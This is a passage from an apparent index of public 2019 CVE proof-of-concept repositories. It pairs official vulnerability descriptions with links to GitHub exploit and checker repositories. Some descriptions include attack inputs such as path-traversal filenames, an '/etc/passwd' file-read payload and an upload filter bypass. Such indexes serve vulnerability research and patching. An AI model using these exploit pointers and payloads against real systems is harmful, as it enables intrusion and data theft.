- [q3k/cve-2019-5736-poc](https://github.com/q3k/cve-2019-5736-poc)
- [Frichetten/CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC)
- [jas502n/CVE-2019-5736](https://github.com/jas502n/CVE-2019-5736)
- [likekabin/CVE-2019-5736](https://github.com/likekabin/CVE-2019-5736)
- [likekabin/cve-2019-5736-poc](https://github.com/likekabin/cve-2019-5736-poc)
- [agppp/cve-2019-5736-poc](https://github.com/agppp/cve-2019-5736-poc)
- [b3d3c/poc-cve-2019-5736](https://github.com/b3d3c/poc-cve-2019-5736)
- [twistlock/RunC-CVE-2019-5736](https://github.com/twistlock/RunC-CVE-2019-5736)
- [yyqs2008/CVE-2019-5736-PoC-2](https://github.com/yyqs2008/CVE-2019-5736-PoC-2)
- [zyriuse75/CVE-2019-5736-PoC](https://github.com/zyriuse75/CVE-2019-5736-PoC)
- [stillan00b/CVE-2019-5736](https://github.com/stillan00b/CVE-2019-5736)
- [milloni/cve-2019-5736-exp](https://github.com/milloni/cve-2019-5736-exp)
- [panzouh/Docker-Runc-Exploit](https://github.com/panzouh/Docker-Runc-Exploit)
- [RyanNgWH/CVE-2019-5736-POC](https://github.com/RyanNgWH/CVE-2019-5736-POC)
- [Lee-SungYoung/cve-2019-5736-study](https://github.com/Lee-SungYoung/cve-2019-5736-study)
- [chosam2/cve-2019-5736-poc](https://github.com/chosam2/cve-2019-5736-poc)
- [epsteina16/Docker-Escape-Miner](https://github.com/epsteina16/Docker-Escape-Miner)
- [geropl/CVE-2019-5736](https://github.com/geropl/CVE-2019-5736)
- [GiverOfGifts/CVE-2019-5736-Custom-Runtime](https://github.com/GiverOfGifts/CVE-2019-5736-Custom-Runtime)
- [Billith/CVE-2019-5736-PoC](https://github.com/Billith/CVE-2019-5736-PoC)
- [BBRathnayaka/POC-CVE-2019-5736](https://github.com/BBRathnayaka/POC-CVE-2019-5736)
- [shen54/IT19172088](https://github.com/shen54/IT19172088)
- [h3xcr4ck3r/CVE-2019-5736](https://github.com/h3xcr4ck3r/CVE-2019-5736)
- [fahmifj/Docker-breakout-runc](https://github.com/fahmifj/Docker-breakout-runc)
- [Asbatel/CVE-2019-5736_POC](https://github.com/Asbatel/CVE-2019-5736_POC)
- [takumak/cve-2019-5736-reproducer](https://github.com/takumak/cve-2019-5736-reproducer)
- [si1ent-le/CVE-2019-5736](https://github.com/si1ent-le/CVE-2019-5736)
### CVE-2019-5737 (2019-03-28)
In Node.js including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1, an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and by sending headers very slowly. This keeps the connection and associated resources alive for a long period of time. Potential attacks are mitigated by the use of a load balancer or other proxy layer. This vulnerability is an extension of CVE-2018-12121, addressed in November and impacts all active Node.js release lines including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1.
- [beelzebruh/cve-2019-5737](https://github.com/beelzebruh/cve-2019-5737)
### CVE-2019-5782 (2019-02-19)
Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.
- [ZwCreatePhoton/CVE-2019-5782_CVE-2019-13768](https://github.com/ZwCreatePhoton/CVE-2019-5782_CVE-2019-13768)
### CVE-2019-5784 (2019-06-27)
Incorrect handling of deferred code in V8 in Google Chrome prior to 72.0.3626.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [rooootdev/CVE-2019-5784-PoC](https://github.com/rooootdev/CVE-2019-5784-PoC)
### CVE-2019-5786 (2019-06-27)
Object lifetime issue in Blink in Google Chrome prior to 72.0.3626.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.
- [exodusintel/CVE-2019-5786](https://github.com/exodusintel/CVE-2019-5786)
### CVE-2019-5822 (2019-06-27)
Inappropriate implementation in Blink in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to bypass same origin policy via a crafted HTML page.
- [Silence-Rain/14-828_Exploitation_of_CVE-2019-5822](https://github.com/Silence-Rain/14-828_Exploitation_of_CVE-2019-5822)
### CVE-2019-5825 (2019-11-25)
Out of bounds write in JavaScript in Google Chrome prior to 73.0.3683.86 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [timwr/CVE-2019-5825](https://github.com/timwr/CVE-2019-5825)
### CVE-2019-5893 (2019-01-10)
Nelson Open Source ERP v6.3.1 allows SQL Injection via the db/utils/query/data.xml query parameter.
- [EmreOvunc/OpenSource-ERP-SQL-Injection](https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection)
### CVE-2019-6111 (2019-01-31)
An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).
- [53n7hu/SNP](https://github.com/53n7hu/SNP)
- [mbadanoiu/MAL-008](https://github.com/mbadanoiu/MAL-008)
### CVE-2019-6203 (2020-04-17)
A logic issue was addressed with improved state management. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2. An attacker in a privileged network position may be able to intercept network traffic.
- [qingxp9/CVE-2019-6203-PoC](https://github.com/qingxp9/CVE-2019-6203-PoC)
### CVE-2019-6207 (2019-12-18)
An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2, watchOS 5.2. A malicious application may be able to determine kernel memory layout.
- [dothanthitiendiettiende/CVE-2019-6207](https://github.com/dothanthitiendiettiende/CVE-2019-6207)
- [maldiohead/CVE-2019-6207](https://github.com/maldiohead/CVE-2019-6207)
- [DimitriFourny/cve-2019-6207](https://github.com/DimitriFourny/cve-2019-6207)
### CVE-2019-6225 (2019-03-05)
A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 12.1.3, macOS Mojave 10.14.3, tvOS 12.1.2. A malicious application may be able to elevate privileges.
- [fatgrass/OsirisJailbreak12](https://github.com/fatgrass/OsirisJailbreak12)
- [TrungNguyen1909/CVE-2019-6225-macOS](https://github.com/TrungNguyen1909/CVE-2019-6225-macOS)
- [raystyle/jailbreak-iOS12](https://github.com/raystyle/jailbreak-iOS12)
### CVE-2019-6249 (2019-01-13)
An issue was discovered in HuCart v5.7.4. There is a CSRF vulnerability that can add an admin account via /adminsys/index.php?load=admins&act=edit_info&act_type=add.
- [AlphabugX/CVE-2019-6249_Hucart-cms](https://github.com/AlphabugX/CVE-2019-6249_Hucart-cms)
### CVE-2019-6250 (2019-01-13)
A pointer overflow, with code execution, was discovered in ZeroMQ libzmq (aka 0MQ) 4.2.x and 4.3.x before 4.3.1. A v2_decoder.cpp zmq::v2_decoder_t::size_ready integer overflow allows an authenticated attacker to overwrite an arbitrary amount of bytes beyond the bounds of a buffer, which can be leveraged to run arbitrary code on the target system. The memory layout allows the attacker to inject OS commands into a data structure located immediately after the problematic buffer (i.e., it is not necessary to use a typical buffer-overflow exploitation technique that changes the flow of control).
- [AkashicYiTai/CVE-2019-6250-libzmq](https://github.com/AkashicYiTai/CVE-2019-6250-libzmq)
### CVE-2019-6260 (2019-01-22)
The ASPEED ast2400 and ast2500 Baseband Management Controller (BMC) hardware and firmware implement Advanced High-performance Bus (AHB) bridges, which allow arbitrary read and write access to the BMC's physical address space from the host (or from the network in unusual cases where the BMC console uart is attached to a serial concentrator). This CVE applies to the specific cases of iLPC2AHB bridge Pt I, iLPC2AHB bridge Pt II, PCIe VGA P2A bridge, DMA from/to arbitrary BMC memory via X-DMA, UART-based SoC Debug interface, LPC2AHB bridge, PCIe BMC P2A bridge, and Watchdog setup.
- [nikitapbst/cve-2019-6260](https://github.com/nikitapbst/cve-2019-6260)
### CVE-2019-6263 (2019-01-16)
An issue was discovered in Joomla! before 3.9.2. Inadequate checks of the Global Configuration Text Filter settings allowed stored XSS.
- [praveensutar/CVE-2019-6263-Joomla-POC](https://github.com/praveensutar/CVE-2019-6263-Joomla-POC)
### CVE-2019-6329 (2019-06-25)
HP Support Assistant 8.7.50 and earlier allows a user to gain system privilege and allows unauthorized modification of directories or files. Note: A different vulnerability than CVE-2019-6328.
- [ManhNDd/CVE-2019-6329](https://github.com/ManhNDd/CVE-2019-6329)
### CVE-2019-6339 (2019-01-22)
In Drupal Core versions 7.x prior to 7.62, 8.6.x prior to 8.6.6 and 8.5.x prior to 8.5.9; A remote code execution vulnerability exists in PHP's built-in phar stream wrapper when performing file operations on an untrusted phar:// URI. Some Drupal code (core, contrib, and custom) may be performing file operations on insufficiently validated user input, thereby being exposed to this vulnerability. This vulnerability is mitigated by the fact that such code paths typically require access to an administrative permission or an atypical configuration.
- [Vulnmachines/drupal-cve-2019-6339](https://github.com/Vulnmachines/drupal-cve-2019-6339)
### CVE-2019-6340 (2019-02-21)
Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services module itself does not require an update at this time, but you should apply other contributed updates associated with this advisory if Services is in use.)
- [g0rx/Drupal-SA-CORE-2019-003](https://github.com/g0rx/Drupal-SA-CORE-2019-003)
- [knqyf263/CVE-2019-6340](https://github.com/knqyf263/CVE-2019-6340)
- [DevDungeon/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass](https://github.com/DevDungeon/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass)
- [oways/CVE-2019-6340](https://github.com/oways/CVE-2019-6340)
- [cved-sources/cve-2019-6340](https://github.com/cved-sources/cve-2019-6340)
- [josehelps/cve-2019-6340-bits](https://github.com/josehelps/cve-2019-6340-bits)
- [jas502n/CVE-2019-6340](https://github.com/jas502n/CVE-2019-6340)
- [ludy-dev/drupal8-REST-RCE](https://github.com/ludy-dev/drupal8-REST-RCE)
- [nobodyatall648/CVE-2019-6340](https://github.com/nobodyatall648/CVE-2019-6340)
### CVE-2019-6440 (2019-01-16)
Zemana AntiMalware before 3.0.658 Beta mishandles update logic.
- [hexnone/CVE-2019-6440](https://github.com/hexnone/CVE-2019-6440)
### CVE-2019-6446 (2019-01-16)
An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources
- [RayScri/CVE-2019-6446](https://github.com/RayScri/CVE-2019-6446)
### CVE-2019-6447 (2019-01-16)
The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.
- [fs0c131y/ESFileExplorerOpenPortVuln](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln)
- [SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447](https://github.com/SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447)
- [Nehal-Zaman/CVE-2019-6447](https://github.com/Nehal-Zaman/CVE-2019-6447)
- [h3xcr4ck3r/CVE-2019-6447](https://github.com/h3xcr4ck3r/CVE-2019-6447)
- [julio-cfa/POC-ES-File-Explorer-CVE-2019-6447](https://github.com/julio-cfa/POC-ES-File-Explorer-CVE-2019-6447)
- [febinrev/CVE-2019-6447-ESfile-explorer-exploit](https://github.com/febinrev/CVE-2019-6447-ESfile-explorer-exploit)
- [Kayky-cmd/CVE-2019-6447--.](https://github.com/Kayky-cmd/CVE-2019-6447--.)
- [VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer](https://github.com/VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer)
- [Osuni-99/CVE-2019-6447](https://github.com/Osuni-99/CVE-2019-6447)
- [Chethine/EsFileExplorer-CVE-2019-6447](https://github.com/Chethine/EsFileExplorer-CVE-2019-6447)
- [vino-theva/CVE-2019-6447](https://github.com/vino-theva/CVE-2019-6447)
- [KaviDk/CVE-2019-6447-in-Mobile-Application](https://github.com/KaviDk/CVE-2019-6447-in-Mobile-Application)
- [Cmadhushanka/CVE-2019-6447-Exploitation](https://github.com/Cmadhushanka/CVE-2019-6447-Exploitation)
### CVE-2019-6453 (2019-02-18)
mIRC before 7.55 allows remote command execution by using argument injection through custom URI protocol handlers. The attacker can specify an irc:// URI that loads an arbitrary .ini file from a UNC share pathname. Exploitation depends on browser-specific URI handling (Chrome is not exploitable).
- [proofofcalc/cve-2019-6453-poc](https://github.com/proofofcalc/cve-2019-6453-poc)
- [andripwn/mIRC-CVE-2019-6453](https://github.com/andripwn/mIRC-CVE-2019-6453)
### CVE-2019-6467 (2019-10-09)
A programming error in the nxdomain-redirect feature can cause an assertion failure in query.c if the alternate namespace used by nxdomain-redirect is a descendant of a zone that is served locally. The most likely scenario where this might occur is if the server, in addition to performing NXDOMAIN redirection for recursive clients, is also serving a local copy of the root zone or using mirroring to provide the root zone, although other configurations are also possible. Versions affected: BIND 9.12.0-> 9.12.4, 9.14.0. Also affects all releases in the 9.13 development branch.
- [knqyf263/CVE-2019-6467](https://github.com/knqyf263/CVE-2019-6467)
### CVE-2019-6487 (2019-01-18)
TP-Link WDR Series devices through firmware v3 (such as TL-WDR5620 V3.0) are affected by command injection (after login) leading to remote code execution, because shell metacharacters can be included in the weather get_weather_observe citycode field.
- [afang5472/TP-Link-WDR-Router-Command-injection_POC](https://github.com/afang5472/TP-Link-WDR-Router-Command-injection_POC)
### CVE-2019-6690 (2019-03-17)
python-gnupg 0.4.3 allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended. To perform the attack, the passphrase to gnupg must be controlled by the adversary and the ciphertext should be trusted. Related to a "CWE-20: Improper Input Validation" issue affecting the affect functionality component.
- [stigtsp/CVE-2019-6690-python-gnupg-vulnerability](https://github.com/stigtsp/CVE-2019-6690-python-gnupg-vulnerability)
- [brianwrf/CVE-2019-6690](https://github.com/brianwrf/CVE-2019-6690)
### CVE-2019-6693 (2019-11-21)
Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users' passwords (except the administrator's password), private keys' passphrases and High Availability password (when set).
- [gquere/CVE-2019-6693](https://github.com/gquere/CVE-2019-6693)
- [synacktiv/CVE-2020-9289](https://github.com/synacktiv/CVE-2020-9289)
- [saladandonionrings/cve-2019-6693](https://github.com/saladandonionrings/cve-2019-6693)
### CVE-2019-6715 (2019-04-01)
pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data.
- [random-robbie/cve-2019-6715](https://github.com/random-robbie/cve-2019-6715)
### CVE-2019-7192 (2019-12-05)
This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
- [cycraft-corp/cve-2019-7192-check](https://github.com/cycraft-corp/cve-2019-7192-check)
- [th3gundy/CVE-2019-7192_QNAP_Exploit](https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit)
### CVE-2019-7213 (2019-04-24)
SmarterTools SmarterMail 16.x before build 6985 allows directory traversal. An authenticated user could delete arbitrary files or could create files in new folders in arbitrary locations on the mail server. This could lead to command execution on the server for instance by putting files inside the web directories.
- [secunnix/CVE-2019-7213](https://github.com/secunnix/CVE-2019-7213)
### CVE-2019-7214 (2019-04-24)
SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.
- [devzspy/CVE-2019-7214](https://github.com/devzspy/CVE-2019-7214)
- [andyfeili/-CVE-2019-7214](https://github.com/andyfeili/-CVE-2019-7214)
### CVE-2019-7216 (2019-01-31)
An issue was discovered in FileChucker 4.99e-free-e02. filechucker.cgi has a filter bypass that allows a malicious user to upload any type of file by using % characters within the extension, e.g., file.%ph%p becomes file.php.
- [Ekultek/CVE-2019-7216](https://github.com/Ekultek/CVE-2019-7216)
### CVE-2019-7219 (2019-04-11)
Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
- [verifysecurity/CVE-2019-7219](https://github.com/verifysecurity/CVE-2019-7219)
### CVE-2019-7238 (2019-03-21)
Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
- [mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238)
- [jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238)
- [verctor/nexus_rce_CVE-2019-7238](https://github.com/verctor/nexus_rce_CVE-2019-7238)
- [magicming200/CVE-2019-7238_Nexus_RCE_Tool](https://github.com/magicming200/CVE-2019-7238_Nexus_RCE_Tool)
- [smallpiggy/CVE-2019-7238](https://github.com/smallpiggy/CVE-2019-7238)
### CVE-2019-7304 (2019-04-23)
Canonical snapd before version 2.37.1 incorrectly performed socket owner validation, allowing an attacker to run arbitrary commands as root. This issue affects: Canonical snapd versions prior to 2.37.1.
- [initstring/dirty_sock](https://github.com/initstring/dirty_sock)
- [SecuritySi/CVE-2019-7304_DirtySock](https://github.com/SecuritySi/CVE-2019-7304_DirtySock)
- [elvi7major/snap_priv_esc](https://github.com/elvi7major/snap_priv_esc)
- [f4T1H21/dirty_sock](https://github.com/f4T1H21/dirty_sock)
### CVE-2019-7356 (2020-11-04)
Subrion CMS v4.2.1 allows XSS via the panel/phrases/ VALUE parameter.
- [ngpentest007/CVE-2019-7356](https://github.com/ngpentest007/CVE-2019-7356)
### CVE-2019-7357 (2020-11-10)
Subrion CMS 4.2.1 has CSRF in panel/modules/plugins/. The attacker can remotely activate/deactivate the plugins.
- [ngpentest007/CVE-2019-7357](https://github.com/ngpentest007/CVE-2019-7357)
### CVE-2019-7406
- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)
### CVE-2019-7482 (2019-12-19)
Stack-based buffer overflow in SonicWall SMA100 allows an unauthenticated user to execute arbitrary code in function libSys.so. This vulnerability impacted SMA100 version 9.0.0.3 and earlier.
- [singletrackseeker/CVE-2019-7482](https://github.com/singletrackseeker/CVE-2019-7482)
- [b4bay/CVE-2019-7482](https://github.com/b4bay/CVE-2019-7482)
- [w0lfzhang/sonicwall-cve-2019-7482](https://github.com/w0lfzhang/sonicwall-cve-2019-7482)
### CVE-2019-7489 (2019-12-23)
A vulnerability in SonicWall Email Security appliance allow an unauthenticated user to perform remote code execution. This vulnerability affected Email Security Appliance version 10.0.2 and earlier.
- [nromsdahl/CVE-2019-7489](https://github.com/nromsdahl/CVE-2019-7489)
### CVE-2019-7609 (2019-03-25)
Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
- [jas502n/kibana-RCE](https://github.com/jas502n/kibana-RCE)
- [mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609)
- [LandGrey/CVE-2019-7609](https://github.com/LandGrey/CVE-2019-7609)
- [hekadan/CVE-2019-7609](https://github.com/hekadan/CVE-2019-7609)
- [rhbb/CVE-2019-7609](https://github.com/rhbb/CVE-2019-7609)
- [dnr6419/CVE-2019-7609](https://github.com/dnr6419/CVE-2019-7609)
- [wolf1892/CVE-2019-7609](https://github.com/wolf1892/CVE-2019-7609)
- [Cr4ckC4t/cve-2019-7609](https://github.com/Cr4ckC4t/cve-2019-7609)
- [OliveiraaX/CVE-2019-7609-KibanaRCE](https://github.com/OliveiraaX/CVE-2019-7609-KibanaRCE)
- [Akshay15-png/CVE-2019-7609](https://github.com/Akshay15-png/CVE-2019-7609)
### CVE-2019-7616 (2019-07-30)
Kibana versions before 6.8.2 and 7.2.1 contain a server side request forgery (SSRF) flaw in the graphite integration for Timelion visualizer. An attacker with administrative Kibana access could set the timelion:graphite.url configuration option to an arbitrary URL. This could possibly lead to an attacker accessing external URL resources as the Kibana process on the host system.
- [random-robbie/CVE-2019-7616](https://github.com/random-robbie/CVE-2019-7616)
### CVE-2019-7642 (2019-03-25)
D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10).
- [xw77cve/CVE-2019-7642](https://github.com/xw77cve/CVE-2019-7642)
### CVE-2019-7839 (2019-06-12)
ColdFusion versions Update 3 and earlier, Update 10 and earlier, and Update 18 and earlier have a command injection vulnerability. Successful exploitation could lead to arbitrary code execution.
- [securifera/CVE-2019-7839](https://github.com/securifera/CVE-2019-7839)
### CVE-2019-8014 (2019-08-20)
Adobe Acrobat and Reader versions 2019.012.20035 and earlier, 2019.012.20035 and earlier, 2017.011.30142 and earlier, 2017.011.30143 and earlier, 2015.006.30497 and earlier, and 2015.006.30498 and earlier have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution .
- [f01965/CVE-2019-8014](https://github.com/f01965/CVE-2019-8014)
### CVE-2019-8331 (2019-02-20)
In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.
- [Snorlyd/https-nj.gov---CVE-2019-8331](https://github.com/Snorlyd/https-nj.gov---CVE-2019-8331)
- [Thampakon/CVE-2019-8331](https://github.com/Thampakon/CVE-2019-8331)
### CVE-2019-8341 (2019-02-15)
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing
- [adindrabkin/llama_facts](https://github.com/adindrabkin/llama_facts)
### CVE-2019-8389 (2019-02-17)
A file-read vulnerability was identified in the Wi-Fi transfer feature of Musicloud 1.6. By default, the application runs a transfer service on port 8080, accessible by everyone on the same Wi-Fi network. An attacker can send the POST parameters downfiles and cur-folder (with a crafted ../ payload) to the download.script endpoint. This will create a MusicPlayerArchive.zip archive that is publicly accessible and includes the content of any requested file (such as the /etc/passwd file).
- [shawarkhanethicalhacker/CVE-2019-8389](https://github.com/shawarkhanethicalhacker/CVE-2019-8389)
### CVE-2019-8449 (2019-09-11)
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
- [mufeedvh/CVE-2019-8449](https://github.com/mufeedvh/CVE-2019-8449)
- [r0lh/CVE-2019-8449](https://github.com/r0lh/CVE-2019-8449)
### CVE-2019-8451 (2019-09-11)
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
- [0xbug/CVE-2019-8451](https://github.com/0xbug/CVE-2019-8451)
- [ianxtianxt/CVE-2019-8451](https://github.com/ianxtianxt/CVE-2019-8451)
- [jas502n/CVE-2019-8451](https://github.com/jas502n/CVE-2019-8451)
- [h0ffayyy/Jira-CVE-2019-8451](https://github.com/h0ffayyy/Jira-CVE-2019-8451)
### CVE-2019-8540 (2019-12-18)
A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2, watchOS 5.2. A malicious application may be able to determine kernel memory layout.
- [maldiohead/CVE-2019-8540](https://github.com/maldiohead/CVE-2019-8540)
### CVE-2019-8561 (2019-12-18)
A logic issue was addressed with improved validation. This issue is fixed in macOS Mojave 10.14.4. A malicious application may be able to elevate privileges.
- [0xmachos/CVE-2019-8561](https://github.com/0xmachos/CVE-2019-8561)
### CVE-2019-8591 (2019-12-18)
A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1. An application may be able to cause unexpected system termination or write kernel memory.
- [jsherman212/used_sock](https://github.com/jsherman212/used_sock)
### CVE-2019-8601 (2019-12-18)
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.
- [BadAccess11/CVE-2019-8601](https://github.com/BadAccess11/CVE-2019-8601)
### CVE-2019-8605 (2019-12-18)
A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1. A malicious application may be able to execute arbitrary code with system privileges.
- [1nteger-c/CVE-2019-8605](https://github.com/1nteger-c/CVE-2019-8605)
### CVE-2019-8627
- [maldiohead/CVE-2019-8627](https://github.com/maldiohead/CVE-2019-8627)
### CVE-2019-8641 (2019-12-18)
An out-of-bounds read was addressed with improved input validation.
- [chia33164/CVE-2019-8641-reproduction](https://github.com/chia33164/CVE-2019-8641-reproduction)
### CVE-2019-8656 (2020-10-27)
This was addressed with additional checks by Gatekeeper on files mounted through a network share. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. Extracting a zip file containing a symbolic link to an endpoint in an NFS mount that is attacker controlled may bypass Gatekeeper.
- [D00MFist/CVE-2019-8656](https://github.com/D00MFist/CVE-2019-8656)
### CVE-2019-8781 (2019-12-18)
A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15. An application may be able to execute arbitrary code with kernel privileges.
- [A2nkF/macOS-Kernel-Exploit](https://github.com/A2nkF/macOS-Kernel-Exploit)
- [TrungNguyen1909/CVE-2019-8781-macOS](https://github.com/TrungNguyen1909/CVE-2019-8781-macOS)
### CVE-2019-8791 (2019-12-18)
An issue existed in the parsing of URL schemes. This issue was addressed with improved URL validation. This issue is fixed in Shazam Android App Version 9.25.0, Shazam iOS App Version 12.11.0. Processing a maliciously crafted URL may lead to an open redirect.
- [ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792](https://github.com/ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792)
### CVE-2019-8805 (2019-12-18)
A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. This issue is fixed in macOS Catalina 10.15.1. An application may be able to execute arbitrary code with system privileges.
- [securelayer7/CVE-2019-8805](https://github.com/securelayer7/CVE-2019-8805)
### CVE-2019-8852 (2020-10-27)
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. An application may be able to execute arbitrary code with kernel privileges.
- [pattern-f/CVE-2019-8852](https://github.com/pattern-f/CVE-2019-8852)
### CVE-2019-8936 (2019-05-15)
NTP through 4.2.8p12 has a NULL Pointer Dereference.
- [snappyJack/CVE-2019-8936](https://github.com/snappyJack/CVE-2019-8936)
### CVE-2019-8942 (2019-02-20)
WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943.
- [brianwrf/WordPress_4.9.8_RCE_POC](https://github.com/brianwrf/WordPress_4.9.8_RCE_POC)
- [synacktiv/CVE-2019-8942](https://github.com/synacktiv/CVE-2019-8942)
- [synod2/WP_CROP_RCE](https://github.com/synod2/WP_CROP_RCE)
- [tuannq2299/CVE-2019-8942](https://github.com/tuannq2299/CVE-2019-8942)
### CVE-2019-8943 (2019-02-20)
WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
- [v0lck3r/CVE-2019-8943](https://github.com/v0lck3r/CVE-2019-8943)
- [hadrian3689/wordpress_cropimage](https://github.com/hadrian3689/wordpress_cropimage)
### CVE-2019-8956 (2019-04-01)
In the Linux Kernel before versions 4.20.8 and 4.19.21 a use-after-free error in the "sctp_sendmsg()" function (net/sctp/socket.c) when handling SCTP_SENDALL flag can be exploited to corrupt memory.
- [butterflyhack/CVE-2019-8956](https://github.com/butterflyhack/CVE-2019-8956)
### CVE-2019-8978 (2019-05-14)
An improper authentication vulnerability can be exploited through a race condition that occurs in Ellucian Banner Web Tailor 8.8.3, 8.8.4, and 8.9 and Banner Enterprise Identity Services 8.3, 8.3.1, 8.3.2, and 8.4, in conjunction with SSO Manager. This vulnerability allows remote attackers to steal a victim's session (and cause a denial of service) by repeatedly requesting the initial Banner Web Tailor main page with the IDMSESSID cookie set to the victim's UDCID, which in the case tested is the institutional ID. During a login attempt by a victim, the attacker can leverage the race condition and will be issued the SESSID that was meant for this victim.
